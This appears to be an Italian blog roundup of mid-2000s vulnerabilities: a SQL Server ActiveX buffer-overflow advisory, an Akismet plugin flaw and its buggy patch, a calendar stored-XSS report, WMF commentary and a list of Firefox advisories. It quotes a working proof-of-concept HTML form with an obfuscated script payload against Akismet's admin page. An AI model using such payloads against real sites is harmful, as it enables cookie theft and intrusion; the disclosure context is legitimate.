Incuriosito dai commenti di un mio precedente post mi sono messo a fare un pò di ricerca in merito, direte voi ma la mattina non hai niente da fare???

Intanto cominio col dire che “mi sono sbagliato”. Perché la vulnerabilità che ho segnalato è si del 2000, perché il componente che ne “soffre” è del 2000

Tale DLL è stata ereditata, pari pari, nella nuova versione di Sql Server 2005, espandendo la vulnerabilità anche a questa fascia di prodotti.

L’advisor recita così:

Microsoft SQL Server ’sqldmo.dll’ ActiveX Control is prone to a buffer-overflow vulnerability because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

[From Microsoft SQL Server sqldmo.dll ActiveX Buffer Overflow Vulnerability]

Dettagli:

Bugtraq ID: 25594

Class: Boundary Condition Error

CVE:

Remote: Yes

Local: No

Published: Sep 07 2007 12:00AM

Updated: Sep 13 2007 12:40PM

Credit: rgod is credited with the discovery of this vulnerability.

Vulnerable: Microsoft SQL Server 2005 SP2

[From Microsoft SQL Server sqldmo.dll ActiveX Buffer Overflow Vulnerability]

Di seguito trovare le 3 PoC: La uno, la due e la TRE (l’originale)!

Ed eccovi qua il bug del giorno, che mi tocca in quanto utilizzatore sfegatato della piattaforma wordpress e del suo inseparabile plugin anti spam (molto da migliorare IMHO!)

WordPress 2.1.3 Akismet Vulnerabilità - Exploit

Gli utenti WordPress che utilizzano il plugin Askimet per combattere lo spam nei commenti farebbero bene a sostituire il plugin “buggato” rilasciato di default con la versione 2.1.3 di WP con Askimet v2.0.2.

Wordpress: Akismet XSS Security Flaw (Beware of the Dog!) ~ mybeNi websecurity

Michael publicated here an advisory about an Akismet Security Vulnerability (Wordpress’ popular antispam plugin), the fixed version is avaible.

<html> <body> <form action=”http://blog.url/wp-admin/plugins.php?page=akismet-key-config” method=”post” id=”akismet-conf”> <input name=”_wpnonce” value=”‘” type=”text”> <input name=”_wp_http_referer” value=”‘%22><script>eval(String.fromCharCode( 97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41) )</script>” type=”text”> <input id=”key” name=”key” size=”15″ maxlength=”12″ value=”1337″> <input name=”submit” value=”Update options »” type=”submit”> </form> </body> </html>

Payload will alert(document.cookie)

Just a PoC, I’m plainly too tired to write full code for making a post or stuff, thanks
UPDATE: The Patch is buggy, Workaround for the wrong “Akismet Link” on your Wordpress Dashboard is avaible here.

Ma è buggata, come avete letto, anche la patch (succede anche nelle migliori famiglie)

Antonio Trigiani w3bL0g - Ingegneria Informatica Virale » Blog Archive » Bug e FIX nell’aggiornamento ad Akismet v2.0.2

Bene, se avete eseguito questo aggiornamento sappiate che è stato inserito un nuovo bug.Per essere più precisi la riga 529

echo ‘<p>’.sprintf(__(’<a href=”%1$s”>Akismet</a> has protected your site from <a href=”%2$s”>%3$s spam comments</a>.’), ‘http://akismet.com/’, clean_url(”$link?page=akismet-admin”), number_format($count) ).’</p>’;

Occorre sostituirla con il seguente workaround:

echo ‘<p>’.sprintf(__(’<a href=”%1$s”>Akismet</a> has protected your site from <a href=”%2$s”>%3$s spam comments</a>.’), ‘http://akismet.com/’, “$link?page=akismet-admin”, number_format($count) ).’</p>’;

Ora, qualcuno saprebbe dirmi in quali altri paradigmi di programmazione collaborativa succedono cose di questo genere?

Patch -> Fix -> Patch -> (e) Fix a poche ore l’uno dall’altro mentre Microsoft impiega settimane… volete altre dimostrazioni? Aspettate pochissimo…

Descrizione

The software does not properly filter HTML tags in the title of events before being passed to user in ‘calendar.php’&’reminder.php AS include’. that may allow a remote user to inject HTML/javascript codes to events of calendar. The hostile code may be rendered in the web browser of the victim user who will Request Reminder for those Events (persistent).
For example an attacker creates new event (Single-All Day Event , Ranged Event OR Recurring Event)with this content:

Maggiori informazioni

Soluzione:

Attentere una nuova versione/patch

Tanto clamore per nulla? Io sinceramente non mi sono affatto scandalizzato per questa GRAVE VULNERABILITA’ di cui tutti parlano, non mi sembra ci sia stato tanto clamore quando non molto tempo fà fu annunciata una (quella si grave) vulnerabilità delle GDI+ che permetteva come per questa sui WMF (Windowd Meta File) di eseguire codice arbitrario ma ATTRAVERSO LE JPEG!!!

Ora perchè seppur girando per internet, spesso alla ricerca di “schifezze” (e chi vuole intendere intenda), non ho mai preso qualche “serpente” (un giorno vi spiegherò la citazione) a causa di questa vulnerability che affligge tutti i Windows (ma anche la versione 2.0?) ?

La risposta è semplice perchè utilizzo un browser che se ne frega delle estensioni di file proprietarie e se proprio deve utilizzare qualcosa per visualizzare dei file vettoriali beh… utilizza SVG!

Vabè polemiche a parte! Avete tutti uno scudetto giallo che in maniera pedante suggerisce di aggiornare… fatelo!

Da Giovy ho preso un bel post che spiega un pò di cosucce in merito qui il bulletin di Microsoft

Qualche altra news la trovate in questo forum inoltre vi passo il link di un exploit checker fatene buon uso mi raccomando

Che differenza passa tra un software conosciuto e ed uno sconosciuto?
Che per quello conosciuto tutti si lamentano delle mancanze, bug e quant’altro … (ma nessuno fà niente ndD)

Che differenza passa tra un software buono e uno scadente?
Che per quello buono, nonostante non sia così conosciuto (il che è tutto da vedere ndD)
c’è gente che si fà in 4 per sistemare le cose … sempre e comunque …
Qui sotto un breve elenco… fate le differenze tra le date degli advisory e la release della versione aggiornata
MFSA 2005-34 - PLUGINSPAGE privileged javascript execution
Severity: High
Fixed in: Firefox 1.0.3

More Info

MFSA 2005-35 - Showing blocked javascript: popup uses wrong privilege context
Severity: Moderate
Fixed in: Firefox 1.0.3, Mozilla Suite 1.7.7

More Info

MFSA 2005-36 - Cross-site Scripting through global scope pollution
Severity: High
Products: Firefox, Mozilla Suite

Fixed in: Firefox 1.0.3, Mozilla Suite 1.7.7

More Info

MFSA 2005-37 - Code execution through javascript: favicons
Severity: Critical
Fixed in: Firefox 1.0.3, Mozilla Suite 1.7.7

More Info

MFSA 2005-38 - Search plugin cross-site scripting
Severity: Moderate
Fixed in: Firefox 1.0.3, Mozilla Suite 1.7.7

More Info

MFSA 2005-39 - Arbitrary code execution from Firefox sidebar panel II
Severity: Critical
Fixed in: Firefox 1.0.3

More Info

MFSA 2005-40 - Missing Install object instance checks
Severity: Moderate
Fixed in: Firefox 1.0.3, Mozilla Suite 1.7.7

More Info

MFSA 2005-33 - Javascript “lambda” replace exposes memory contents
Severity: Moderate
Fixed in: Firefox 1.0.3, Mozilla Suite 1.7.7

More Info